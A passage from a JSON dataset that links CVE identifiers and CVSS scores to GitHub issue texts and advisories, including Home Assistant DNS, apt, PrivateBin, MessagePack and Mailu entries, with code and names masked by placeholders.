APITAG should be open to the user I like coredns , but it does feel rather out of place in an appliance it's approach to dynamic timeouts isn't really very well tuned to the foibles of domestic connections/networks.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-36517",
        "Issue_Url_old": "https://github.com/home-assistant/plugin-dns/issues/53",
        "Issue_Url_new": "https://github.com/home-assistant/plugin-dns/issues/53",
        "Repo_new": "home-assistant/plugin-dns",
        "Issue_Created_At": "2021-08-17T02:16:14Z",
        "description": "Don't hard code upstream DNS resolvers. Applications should not hard code their own DNS resolvers; they should use the configuration provided by the network (via DHCP) or by the user, perhaps with an overridable default if no other option exists. This is an anti pattern: URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-36517",
        "Issue_Url_old": "https://github.com/home-assistant/plugin-dns/issues/20",
        "Issue_Url_new": "https://github.com/home-assistant/plugin-dns/issues/20",
        "Repo_new": "home-assistant/plugin-dns",
        "Issue_Created_At": "2020-12-26T11:35:40Z",
        "description": "Not resolving local host names. In home assistant, if I use hostnames in FILETAG they fail to resolve (eg using platform snmp ). Using the corresponding IP addresses works, but is far from ideal and means I have to use fixed IP addresses and configuration becomes less unreadable and requires more maintenance. Trying to work out what is the root issue is, has led me to hassio dns seemingly not working as I would expect. The homeassistant docker container appears to be using APITAG for dns which is the hassio dns container. From within the homeassistant container this local hostname fails to resolve: dig APITAG and I can see from the dig output it is going out to the Internet to do the DNS lookup. But dig APITAG APITAG from home assistant does work (not surprisingly). The strange thing is from within the hassio dns container, fully qualified and unqualified local hostname lookups do work: dig APITAG dig pdu3 But dig APITAG APITAG does not work (unsurprisingly). What I would expect is that fully qualified and unqualified hostnames should resolve as I have set the search domain to APITAG and dns server to APITAG in APITAG I don't think this has ever worked with hassio dns.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-36517",
        "Issue_Url_old": "https://github.com/home-assistant/plugin-dns/issues/51",
        "Issue_Url_new": "https://github.com/home-assistant/plugin-dns/issues/51",
        "Repo_new": "home-assistant/plugin-dns",
        "Issue_Created_At": "2021-07-11T20:22:04Z",
        "description": "Dns stops resolving within hours/days. Ha is configured with a local dns resolver, while all other means of resolving are blocked on our home automation subnet. When (re)started, HA dns runs perfectly fine, and can resolve all queries through the assigned server. CODETAG After a few hours, the resolver just stops resolving through the programmed server. and switches to dot NUMBERTAG APITAG for all dns requests, which are all refused by the router ofcourse. Somehow HA jforgot, that APITAG is its assigned dns server. I'd like to add full dns logs, but 'ha dns logs' just gives me the last errors, and not the full logfile. If there's a way to give more info, let me know and I'll add the data.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-36517",
        "Issue_Url_old": "https://github.com/home-assistant/plugin-dns/issues/50",
        "Issue_Url_new": "https://github.com/home-assistant/plugin-dns/issues/50",
        "Repo_new": "home-assistant/plugin-dns",
        "Issue_Created_At": "2021-06-30T12:07:56Z",
        "description": "performance impact after dns update to APITAG Since dns upgrade to APITAG my complete hassio setup is having performance issues. I am running haos on Raspberry Pi NUMBERTAG B. It's an old pi, but before dns APITAG everything was running without issues and I had no reason to upgrade hardware. Since dns upgrade, coredns will eventually get stuck at more than NUMBERTAG CPU usage constantly and everything else slows down to the level that it's unusable. Even 'ha dns restart' is failing with time out. It's happening also with clean image install without configuring any integrations. When I downgrade to dns APITAG using 'ha dns update version APITAG CPU usage is back to normal and whole system is responsive. Downgrading dns is not permanent fix as it gets automatically updated back to last version and CPU load increases again. Is there an option to permanently downgrade to dns APITAG or disable APITAG completely (if TLS is causing too much load on rpi1)? dns logs using APITAG [INFO] APITAG NUMBERTAG NS IN . udp NUMBERTAG false NUMBERTAG NOERROR NUMBERTAG s [ERROR] plugin/errors NUMBERTAG NS: tls: APITAG timed out [INFO] APITAG NUMBERTAG NS IN . udp NUMBERTAG false NUMBERTAG NOERROR NUMBERTAG s [ERROR] plugin/errors NUMBERTAG NS: tls: APITAG timed out [INFO] APITAG NUMBERTAG NS IN . udp NUMBERTAG false NUMBERTAG NOERROR NUMBERTAG s [ERROR] plugin/errors NUMBERTAG NS: tls: APITAG timed out [INFO] APITAG NUMBERTAG NS IN . udp NUMBERTAG false NUMBERTAG NOERROR NUMBERTAG s [ERROR] plugin/errors NUMBERTAG NS: tls: APITAG timed out [INFO] APITAG NUMBERTAG NS IN . udp NUMBERTAG false NUMBERTAG NOERROR NUMBERTAG s [ERROR] plugin/errors NUMBERTAG NS: tls: APITAG timed out [INFO] APITAG NUMBERTAG NS IN . udp NUMBERTAG false NUMBERTAG NOERROR NUMBERTAG s [ERROR] plugin/errors NUMBERTAG NS: tls: APITAG timed out [INFO] APITAG NUMBERTAG NS IN . udp NUMBERTAG false NUMBERTAG NOERROR NUMBERTAG s [ERROR] plugin/errors NUMBERTAG NS: tls: APITAG timed out [INFO] APITAG NUMBERTAG NS IN . udp NUMBERTAG false NUMBERTAG NOERROR NUMBERTAG s [ERROR] plugin/errors NUMBERTAG NS: tls: APITAG timed out [INFO] APITAG NUMBERTAG NS IN . udp NUMBERTAG false NUMBERTAG NOERROR NUMBERTAG s [ERROR] plugin/errors NUMBERTAG NS: tls: APITAG timed out dns logs using APITAG (everything else the same, just downgraded dns): [INFO] APITAG NUMBERTAG PTR IN NUMBERTAG APITAG APITAG udp NUMBERTAG false NUMBERTAG NXDOMAIN qr,aa,rd,ra NUMBERTAG s [INFO] APITAG NUMBERTAG PTR IN NUMBERTAG APITAG APITAG udp NUMBERTAG false NUMBERTAG NXDOMAIN qr,aa,rd,ra NUMBERTAG s [INFO] APITAG NUMBERTAG PTR IN NUMBERTAG in APITAG udp NUMBERTAG false NUMBERTAG NXDOMAIN qr,aa,rd,ra NUMBERTAG s [INFO] APITAG NUMBERTAG PTR IN NUMBERTAG APITAG APITAG udp NUMBERTAG false NUMBERTAG NXDOMAIN qr,aa,rd,ra NUMBERTAG s [INFO] APITAG NUMBERTAG PTR IN NUMBERTAG APITAG APITAG udp NUMBERTAG false NUMBERTAG NXDOMAIN qr,aa,rd,ra NUMBERTAG s [INFO] APITAG NUMBERTAG PTR IN NUMBERTAG APITAG APITAG udp NUMBERTAG false NUMBERTAG NXDOMAIN qr,aa,rd,ra NUMBERTAG s [INFO] APITAG NUMBERTAG PTR IN NUMBERTAG APITAG APITAG udp NUMBERTAG false NUMBERTAG NXDOMAIN qr,aa,rd,ra NUMBERTAG s [INFO] APITAG NUMBERTAG PTR IN NUMBERTAG in APITAG udp NUMBERTAG false NUMBERTAG NXDOMAIN qr,aa,rd,ra NUMBERTAG s [INFO] APITAG NUMBERTAG PTR IN NUMBERTAG APITAG APITAG udp NUMBERTAG false NUMBERTAG NXDOMAIN qr,aa,rd,ra NUMBERTAG s [INFO] APITAG NUMBERTAG PTR IN NUMBERTAG APITAG APITAG udp NUMBERTAG false NUMBERTAG NXDOMAIN qr,aa,rd,ra NUMBERTAG s [INFO] APITAG NUMBERTAG PTR IN NUMBERTAG APITAG APITAG udp NUMBERTAG false NUMBERTAG NXDOMAIN qr,aa,rd,ra NUMBERTAG s [INFO] APITAG NUMBERTAG PTR IN NUMBERTAG APITAG APITAG udp NUMBERTAG false NUMBERTAG NXDOMAIN qr,aa,rd,ra NUMBERTAG s [INFO] APITAG NUMBERTAG PTR IN NUMBERTAG in APITAG udp NUMBERTAG false NUMBERTAG NXDOMAIN qr,aa,rd,ra NUMBERTAG s [INFO] APITAG NUMBERTAG PTR IN NUMBERTAG APITAG APITAG udp NUMBERTAG false NUMBERTAG NXDOMAIN qr,aa,rd,ra NUMBERTAG s [INFO] APITAG NUMBERTAG PTR IN NUMBERTAG APITAG APITAG udp NUMBERTAG false NUMBERTAG NXDOMAIN qr,aa,rd,ra NUMBERTAG s [INFO] APITAG NUMBERTAG PTR IN NUMBERTAG APITAG APITAG udp NUMBERTAG false NUMBERTAG NXDOMAIN qr,aa,rd,ra NUMBERTAG s [INFO] APITAG NUMBERTAG PTR IN NUMBERTAG APITAG APITAG udp NUMBERTAG false NUMBERTAG NXDOMAIN qr,aa,rd,ra NUMBERTAG s [INFO] APITAG NUMBERTAG PTR IN NUMBERTAG in APITAG udp NUMBERTAG false NUMBERTAG NXDOMAIN qr,aa,rd,ra NUMBERTAG s [INFO] APITAG NUMBERTAG PTR IN NUMBERTAG APITAG APITAG udp NUMBERTAG false NUMBERTAG NXDOMAIN qr,aa,rd,ra NUMBERTAG s [INFO] APITAG NUMBERTAG PTR IN NUMBERTAG APITAG APITAG udp NUMBERTAG false NUMBERTAG NXDOMAIN qr,aa,rd,ra NUMBERTAG s core NUMBERTAG supervisor APITAG Home Assistant OS NUMBERTAG CPU arm NUMBERTAG l",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-36517",
        "Issue_Url_old": "https://github.com/home-assistant/plugin-dns/issues/70",
        "Issue_Url_new": "https://github.com/home-assistant/plugin-dns/issues/70",
        "Repo_new": "home-assistant/plugin-dns",
        "Issue_Created_At": "2022-01-15T15:35:56Z",
        "description": "Home Assistant OS leaks private host names to cloudflare DNS service. Describe the issue you are experiencing Home Assistant OS always gets configured to load balance between my DNS resolver and Cloudflare's. I already looked under every stone, but there's no way to disable this behavior using configuration options. So if I use DNS names configured by my router instead of hard coding IP addresses, HA will switch over to Cloudflare from time to time and leak my internal hostnames to their service. Of course resolution fails in this case, too. Note that this is not caused by the hard coded fallback option, but by the hard coded load balancing option. One way to avoid this could be blocking NUMBERTAG and NUMBERTAG in my firewall, but then HA's DNS resolver goes berserk flooding my firewall logs with multiple connection attempts per second. Also, this will break further whenever developers decide to switch their user base from Cloudflare to a new data collection service. What operating system image do you use? ova (for Virtual Machines) What version of Home Assistant Operating System is installed NUMBERTAG Did you upgrade the Operating System. Yes Steps to reproduce the issue NUMBERTAG Insert local hostname in HA config NUMBERTAG Notice recurring failures in name resolution NUMBERTAG Notice packets going to NUMBERTAG and NUMBERTAG Anything in the Supervisor logs that might be useful for us? APITAG Anything in the Host logs that might be useful for us? ERRORTAG System Health information _No response_ Additional information _No response_",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-36517",
        "Issue_Url_old": "https://github.com/home-assistant/plugin-dns/issues/54",
        "Issue_Url_new": "https://github.com/home-assistant/plugin-dns/issues/54",
        "Repo_new": "home-assistant/plugin-dns",
        "Issue_Created_At": "2021-08-25T19:14:14Z",
        "description": ".local named devices (i.e. ESPHOME devices) only resolve for a few minutes after booting HA. APITAG devices show up being APITAG only a few minutes after booting the system. After that, they turn to APITAG although they are still online. mDNS resolving seems to breakdown within a few minutes after rebooting the OS. Running Home Assistant Operating System, which is, according to the site, the recommended installation method.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-36518",
        "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2816",
        "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2816",
        "Repo_new": "fasterxml/jackson-databind",
        "Issue_Created_At": "2020-08-13T01:12:31Z",
        "description": "Optimize ERRORTAG wrt recursion. Current implementation ERRORTAG is likely relatively expensive for deeply nested Object and Array values as it uses recursion even for \"vanilla\" case (one where there are no custom List /array or Map deserializers). It seems possible to rewrite this similar to what APITAG does. If this is not possible, should at least NUMBERTAG Test to see maximum nesting level that default JVM settings can handle (for my desktop, just to get an order of magnitude idea NUMBERTAG Possible define maximum recursion limit (for bonus points make configurable).",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-3810",
        "Issue_Url_old": "https://github.com/Debian/apt/issues/111",
        "Issue_Url_new": "https://github.com/debian/apt/issues/111",
        "Repo_new": "Debian/apt",
        "Issue_Created_At": "2020-05-11T03:15:00Z",
        "description": "An out of bounds bug occurs in the APITAG function. An out of bounds bug occurs in the APITAG function from very early version NUMBERTAG An abnormally formatted .deb file may cause the function APITAG to access memory out of bounds at APITAG . The steps and files of reproducing the bug are as follows: ERRORTAG Line NUMBERTAG of APITAG is APITAG , which checkes the value of APITAG , if it is APITAG or APITAG , then minus I by NUMBERTAG For the value of APITAG is just spaces, the unsigned int variable I minus itself to APITAG , causing an out of bounds memroy access and testdeb crashing. For apt is used by milions of users, it is needed to make sure it checks error when bad deb file given. Adding detection of variable values is a straightforward fix. ERRORTAG Do you need to strengthen the file format check in other places? Thanks for you attention. FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-4043",
        "Issue_Url_old": "https://github.com/phpMussel/phpMussel/issues/167",
        "Issue_Url_new": "https://github.com/phpmussel/phpmussel/issues/167",
        "Repo_new": "phpmussel/phpmussel",
        "Issue_Created_At": "2018-08-23T19:12:13Z",
        "description": "Phar unserialization vulnerability.. An unserialization vulnerability was recently discovered which affects the phar wrapper. Due to that APITAG implements the phar wrapper for reading archives, this vulnerability also currently affects all currently supported versions of APITAG to the extent of its ability to read archives. I would __ strongly __ recommend that all APITAG users __ disable archive checking __ in APITAG until further notice. This can be achieved by setting APITAG to false in the APITAG configuration (at which point, APITAG would be unable to scan the content of archives, but would also be protected from this vulnerability). Currently planning exactly how to resolve this problem for APITAG but it'll most likely involve a complete overhaul of how APITAG handles archives, and involve completely ditching the phar wrapper in favour of something else. Anyway, I'll reply here with any relevant updates that happen, new information, etc, and announce here when the problem is resolved.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-4067",
        "Issue_Url_old": "https://github.com/coturn/coturn/issues/583",
        "Issue_Url_new": "https://github.com/coturn/coturn/issues/583",
        "Repo_new": "coturn/coturn",
        "Issue_Created_At": "2020-06-17T10:12:53Z",
        "description": "Reporting a security issue (placeholder). Hi, I would like to report a (potentially exploitable) security issue in coturn, but I am not sure what the expected process is and if you desire to discuss this issue confidentially until it is resolved. Regarding the criticality/impact: I am not completely sure, what the impact is, but I can imagine that this can be practically exploited depending on the exact scenario where coturn is used in. In summary, I'd really like to have this issue resolved. Could you please give me guidance on how to proceed?",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-4068",
        "Issue_Url_old": "https://github.com/kylebrowning/APNSwift/issues/31",
        "Issue_Url_new": "https://github.com/swift-server-community/apnswift/issues/31",
        "Repo_new": "swift-server-community/apnswift",
        "Issue_Created_At": "2019-07-22T13:01:29Z",
        "description": "address sanitizer failure. Describe the bug This looks like quite a serious bug, the test suite is failing address sanitizer: ERRORTAG To Reproduce Steps to reproduce the behavior NUMBERTAG run tests with APITAG Expected behavior passes OS: APITAG Catalina FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-5217",
        "Issue_Url_old": "https://github.com/twitter/secure_headers/issues/418",
        "Issue_Url_new": "https://github.com/github/secure_headers/issues/418",
        "Repo_new": "github/secure_headers",
        "Issue_Created_At": "2020-01-21T16:25:57Z",
        "description": "Filtering CSP entries to prevent bypassing rules. Consider the following Rails controller action which overwrites the frame ancestors based on some user input: CODETAG This results into the following response header: APITAG This shows unexpected output, because by setting the frame ancestors the user is able to change the APITAG opening possibilities for XSS. One solution to this would be to filter out the CSP rules inside of specific CSP rules: APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.8,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-5223",
        "Issue_Url_old": "https://github.com/PrivateBin/PrivateBin/issues/554",
        "Issue_Url_new": "https://github.com/privatebin/privatebin/issues/554",
        "Repo_new": "privatebin/privatebin",
        "Issue_Created_At": "2019-12-25T08:12:19Z",
        "description": "HTML injection via unescaped attachment filename. I investigated the error condition found in the property based unit test URLTAG with RNG state NUMBERTAG b8f0d4ec2a NUMBERTAG b5 URLTAG for the APITAG class in an unrelated change. The error occurs in the APITAG method, were we can provide a string that will have the filename inserted in place of any APITAG in that string and which then becomes the text node of the link to download the attachment. The error condition that jsverify found was when it generated a prefix APITAG for that label (so the label generated in that test case became APITAG ). Since we insert that label untouched, it attempts to set another link into text node of a link, which isn't allowed in HTML and in the jsdom based environment gets silently ignored Hence the test failed only for APITAG tags, as other tags are allowed inside a link. While the label itself is from a trusted source (hardcoded in the translation files and APITAG the filename that is injected isn't. If one would create a paste with attachment with a name containing HTML code (that can be easily done using one of the CLI clients), that paste would have that snippet injected when the paste is displayed. I have prepared a patch and updated unit test case that does the HTML entity encoding to address this and will push this ASAP. While file uploads are disabled by default, I would still suggest that we publish a release with this fix. Your opinions?",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.4,
        "impactScore": 2.7,
        "exploitabilityScore": 1.3
    },
    {
        "CVE_ID": "CVE-2020-5234",
        "Issue_Url_old": "https://github.com/neuecc/MessagePack-CSharp/issues/810",
        "Issue_Url_new": "https://github.com/neuecc/messagepack-csharp/issues/810",
        "Repo_new": "neuecc/messagepack-csharp",
        "Issue_Created_At": "2020-02-07T23:25:01Z",
        "description": "APITAG returns null on copied instances. When a APITAG instance is mutated, the copy constructor doesn't initialize its APITAG field, leading to future calls to APITAG to return null. What's particularly hazardous about this is that null is interpreted by APITAG to mean \"default comparer\" so it defeats the hash collision resistant fixes we made recently.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-5234",
        "Issue_Url_old": "https://github.com/aspnet/Announcements/issues/405",
        "Issue_Url_new": "https://github.com/aspnet/announcements/issues/405",
        "Repo_new": "aspnet/announcements",
        "Issue_Created_At": "2020-01-31T17:10:21Z",
        "description": "Microsoft Security Advisory | APITAG Denial of Service. Microsoft Security Advisory | APITAG Denial of Service APITAG APITAG Executive summary This advisory is being published in response to a recent security advisory for the APITAG APITAG package URLTAG . Since ASP.NET Core APITAG users may be using this package, we want to bring this issue to the attention of all ASP.NET Core users. Microsoft is releasing this security advisory to provide information about a vulnerability that affects ASP.NET Core. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. A denial of service vulnerability exists when using the APITAG URLTAG APITAG package. An attacker who successfully exploited this vulnerability could cause a denial of service against an ASP.NET Core application. The vulnerability can be exploited remotely, without authentication. A remote unauthenticated attacker could exploit this vulnerability by issuing specially crafted requests to the ASP.NET Core application. The update addresses the vulnerability by correcting how APITAG handles deserialization. Discussion Discussion for this issue can be found at URLTAG TBD APITAG APITAG Mitigation factors Microsoft has not identified any mitigating factors for this vulnerability. APITAG APITAG How do I know if I am affected? If you have a runtime or SDK with a version listed in affected software affected runtime or your application has a dependency on any of the packages listed in affected packages affected packages , you are exposed to the vulnerability. APITAG APITAG Affected software Any .NET Core NUMBERTAG or NUMBERTAG application using APITAG with the APITAG Hub Protocol. APITAG APITAG Affected packages Any ASP.NET Core based application that uses any of the vulnerable packages shown below, or any ASP.NET Core application running on .NET Core NUMBERTAG or NUMBERTAG Package name | Vulnerable versions | Secure versions | | APITAG NUMBERTAG With code change described below APITAG NUMBERTAG Update transitive reference to APITAG NOTE: APITAG NUMBERTAG is not compatible with ASP.NET Core APITAG APITAG APITAG How do I fix the issue? First examine the packages you have installed. If you have a vulnerable version of APITAG in your package graph, you must update it. If you have a reference to APITAG in your project, you likely have a vulnerable version of APITAG and should fix it by directly referencing a secure version fixing transitive dependencies . In addition to updating you must set the APITAG static property to enable the ERRORTAG mode for the APITAG serializer, to ensure you are protected. See the APITAG advisory URLTAG for details. Add the following code to the top of your app's entry point: ERRORTAG If your application provides any custom APITAG implementations, you should also update them to include the relevant security measures by ensuring reads of variable length values (such as strings) are done within a APITAG block. See the APITAG advisory URLTAG for more details. Direct dependencies Direct dependencies are discoverable by examining your csproj file. They can be fixed by editing the project file fixing direct dependencies or using APITAG to update the dependency. Transitive dependencies Transitive dependencies occur when you add a package to your project that in turn relies on another package. For example, if Contoso publishes a package APITAG that, in turn, depends on APITAG and you add the APITAG package to your project now your project has a direct dependency on APITAG and, because APITAG depends APITAG your application gains a transitive dependency on the APITAG package. Transitive dependencies are reviewable in two ways: In the Visual Studio Solution Explorer window, which supports searching. By examining the APITAG file contained in the obj directory of your project for csproj based projects The APITAG files are the authoritative list of all packages used by your project, containing both direct and transitive dependencies. There are two ways to view transitive dependencies. You can either use Visual Studio\u2019s Solution Explorer vs solution explorer , or you can review the APITAG file project assets json) . APITAG APITAG Using Visual Studio Solution Explorer To use Solution Explorer, open the project in Visual Studio, and then press Ctrl+; to activate the search in Solution Explorer. Search for the vulnerable package affected software and make a note of the version numbers of any results you find. For example, searching for APITAG in an example project that contains a package that takes a dependency on APITAG shows the following results in Visual Studio NUMBERTAG FILETAG The search results appear as a tree. In the previous results, you can see that a reference to APITAG version NUMBERTAG is discovered. Under the Dependencies node is a APITAG node. Under the APITAG node is the list of packages you have directly taken a dependency on and their versions. In screenshot, the application takes a direct dependency on APITAG . APITAG in turn has leaf nodes that list its dependencies and their versions. The APITAG package takes a dependency on a version of APITAG , that in turn takes a dependency on a version of APITAG . APITAG APITAG Manually reviewing FILETAG Open the FILETAG file from your project\u2019s obj directory in your editor. We suggest you use an editor that understands JSON and allows you to collapse and expand nodes to review this file. Visual Studio and Visual Studio Code provide JSON friendly editing. Search the FILETAG file for the vulnerable package affected software , using the format APITAG for each of the package names from the preceding table. If you find the assembly name in your search: v Examine the line on which they are found, the version number is after the APITAG . Compare to the vulnerable versions table affected software . For example, a search result that shows APITAG is a reference to version NUMBERTAG of APITAG . If your FILETAG file includes references to the vulnerable package affected software , then you need to fix the transitive dependencies. If you have not found any reference to any vulnerable packages, this means either None of your direct dependencies depend on any vulnerable packages, or You have already fixed the problem by updating the direct dependencies. APITAG APITAG Fixing Dependencies APITAG APITAG Fixing direct dependencies Open APITAG in your editor. If you're using Visual Studio, right click the project and choose Edit APITAG from the context menu, where projectname is the name of your project. Look for APITAG elements. The following shows an example project file: CODETAG The preceding example has a reference to the vulnerable package affected software , as seen by the single APITAG element. The name of the package is in the Include attribute. The package version number is in the Version attribute. The previous example shows a single direct dependency on APITAG version NUMBERTAG To update the version to the secure package, change the version number to the updated package version as listed on the table previously affected software . In this example, update APITAG to the appropriate fixed package number affected software for your major version. Save the csproj file. The example csproj now looks as follows: CODETAG If you're using Visual Studio and you save your updated csproj file, Visual Studio will restore the new package version. You can see the restore results by opening the Output window APITAG and changing the Show output from drop down list to Package Manager . If you're not using Visual Studio, open a command line and change to your project directory. Execute the dotnet restore command to restore the updated dependencies. Now recompile your application. If after recompilation you see a Dependency conflict warning , you must update your other direct dependencies to versions that take a dependency on the updated package. APITAG APITAG Fixing transitive dependencies If your transitive dependency review found references to the vulnerable package affected software , you must add a direct dependency to the updated package to your csproj file to override the transitive dependency. Open APITAG in your editor. If you're using Visual Studio, right click the project and choose Edit APITAG from the context menu, where projectname is the name of your project. Look for APITAG nodes, for example: CODETAG You must add a direct dependency to the updated version of the vulnerable package affected software by adding it to the csproj file. You do this by adding a new line to the dependencies section, referencing the fixed version. For example, if your search showed a transitive reference to a vulnerable APITAG version, you'd add a reference to the fixed package number affected software . CODETAG After you've added the direct dependency reference, save your csproj file. If you're using Visual Studio, save your updated csproj file and Visual Studio will restore the new package versions. You can see the restore results by opening the Output window APITAG and changing the Show output from drop down list to Package Manager . If you're not using Visual Studio, open a command line and change to your project directory. Execute the dotnet restore command to restore the new dependencies. Finally, you must rebuild your application, test, and redeploy. Other Information Reporting Security Issues If you have found a potential security issue in .NET Core, please email details to EMAILTAG . Reports may qualify for the .NET Core Bug Bounty. Details of the .NET Core Bug Bounty including terms and conditions are at URLTAG URLTAG . Support You can ask questions about this issue on APITAG in the .NET Core APITAG organization. The main repos are located at URLTAG and URLTAG The Announcements repo ( URLTAG will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Acknowledgments Levi Broderick and Andrew Arnott of Microsoft Corporation External Links Security Advisory from the APITAG package authors URLTAG Revisions NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-5239",
        "Issue_Url_old": "https://github.com/Mailu/Mailu/issues/1354",
        "Issue_Url_new": "https://github.com/mailu/mailu/issues/1354",
        "Repo_new": "mailu/mailu",
        "Issue_Created_At": "2020-02-08T09:30:20Z",
        "description": "WARNING Fetchmail security update to all branches, update ASAP. On NUMBERTAG we discovered a bug in the Fetchmail script for Mailu that has serious security consequences. If you are using the fetchmail container for Mailu (which is optional), please apply the following instructions as soon as possible. If you know any Mailu administrator, please spread the word. Instructions NUMBERTAG Before anything else, make sure that you can access your container logs, and create a backup if you are using the default logging driver, as update may overwrite these logs and make post analysis more difficult NUMBERTAG Then apply one of the following mitigations. A. If running on NUMBERTAG or master, update the fetchmail container : docker compose pull fetchmail; docker compose up d B. If running on another version, upgrade at least to NUMBERTAG if possilbe to NUMBERTAG C. In case you need time before updating the container or upgrading Mailu, disable the fetchmail service : docker compose stop fetchmail (then comment out the fetchmail section from the compose file to avoid any later mistake NUMBERTAG If you suspect any exploitation might have taken place, bring down Mailu, modify the APITAG with a new NUMBERTAG bytes random value, then bring Mailu back up. Change your password for every fetched account configured on your Mailu instance NUMBERTAG Inspect your logs and database for any application tokens that might be illegitimate or recently modified accounts that could indicate an illegitimate password change (which could both be consequences of a successful exploit). Take action accordingly, and feel free to ask any question on the discussion thread. Timeline NUMBERTAG ulnerability reported and confirmed NUMBERTAG patch published to branches NUMBERTAG to master, advisory published Details The vulnerability requires authenticated access for exploitation, so patching is even more urgent if you have open registrations or untrusted users on your Mailu server. We will update this post in the next few days with details about the discovery, analysis and fix for this vulnerability. We will possibly request a CVE identifier for this, given the serious impact, so that visibility is maximum and Mailu administrators upgrade quickly. The current estimated CVSS is over NUMBERTAG We will also provide plausible exploitation markers (additional to instructions in steps NUMBERTAG although we did not find anything suspicious on any of three Mailu instances we manage that have open registration.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-5283",
        "Issue_Url_old": "https://github.com/viewvc/viewvc/issues/211",
        "Issue_Url_new": "https://github.com/viewvc/viewvc/issues/211",
        "Repo_new": "viewvc/viewvc",
        "Issue_Created_At": "2020-03-26T18:08:02Z",
